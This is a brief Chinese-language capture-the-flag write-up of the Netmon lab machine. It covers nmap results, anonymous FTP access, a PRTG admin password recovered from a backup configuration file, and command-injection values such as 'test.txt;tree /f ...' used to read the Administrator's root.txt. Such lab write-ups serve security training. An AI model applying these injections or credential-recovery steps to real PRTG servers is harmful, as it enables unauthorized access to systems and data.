nmap先扫一波:
root@kali:~# nmap -sV -sT -sC -T5 10.10.10.152
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-22 20:46 EDT
Warning: 10.10.10.152 giving up on port because retransmission cap hit (2).
Stats: 0:01:07 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.98% done; ETC: 20:47 (0:00:00 remaining)
Nmap scan report for 10.10.10.152
Host is up (0.22s latency).
Not shown: 887 closed ports, 108 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19 12:18AM 1024 .rnd
| 02-25-19 10:15PM <DIR> inetpub
| 07-16-16 09:18AM <DIR> PerfLogs
| 02-25-19 10:56PM <DIR> Program Files
| 02-03-19 12:28AM <DIR> Program Files (x86)
| 02-03-19 08:08AM <DIR> Users
|_02-25-19 11:49PM <DIR> Windows
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-04-22 20:47:28
|_ start_date: 2019-04-22 20:31:55
可以匿名访问21端口:
ftp://10.10.10.152/Users/Public/user.txt
80端口运行PRTG Network Monitor服务
在c:\Windows\下发现配置文件restart.bat
net stop PRTGCoreService
copy "c:\Windows\PRTG Configuration.dat" "C:\ProgramData\Paessler\PRTG Network Monitor"
net start PRTGCoreService
进而在C:\ProgramData\Paessler\PRTG Network Monitor目录中发现备份文件PRTG Configuration.old.bak,查找到明文用户名密码,尝试登陆后失败,PrTg@dmin2019登陆成功。
google一波漏洞:PRTG < 18.2.39 Command Injection Vulnerability
先查看一下目录结构:
test.txt;tree /f c:\Users\Administrator > c:\output.txt
调整时间为6s使其反应迅速
成功导出文件
接着读取root.txt,相同操作即可
test.txt;more c:\Users\Administrator\Desktop\root.txt > c:\output1.txt
网友评论